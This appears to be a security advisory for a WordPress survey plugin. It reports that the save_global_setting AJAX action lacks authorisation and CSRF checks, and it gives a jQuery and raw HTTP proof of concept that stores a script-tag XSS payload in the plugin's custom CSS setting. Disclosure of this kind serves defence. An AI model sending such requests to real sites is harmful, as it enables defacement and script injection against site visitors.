The plugin does not have proper authorisation nor CSRF checks in the save_global_setting AJAX action, allowing unauthenticated users to edit surveys and modify settings. Given the lack of sanitisation and escaping in the settings, this could also lead to a Stored Cross-Site Scripting issue which will be executed in the context of a user viewing any survey
jQuery.post("https://example.com/wp-admin/admin-ajax.php?action=save_global_setting",{
ps_global_options:{ps_options_custom_css:"body{background-color:blue !important;}</style><script>alert(/XSS/)</script><style>"}
})
POST /wp-admin/admin-ajax.php?action=save_global_setting HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 160
Connection: close
ps_global_options%5Bps_options_custom_css%5D=body%7Bbackground-color%3Ablue+!important%3B%7D%3C%2Fstyle%3E%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E%3Cstyle%3E
This will cause all posts with a survey to be rendered blue, along with the XSS alert.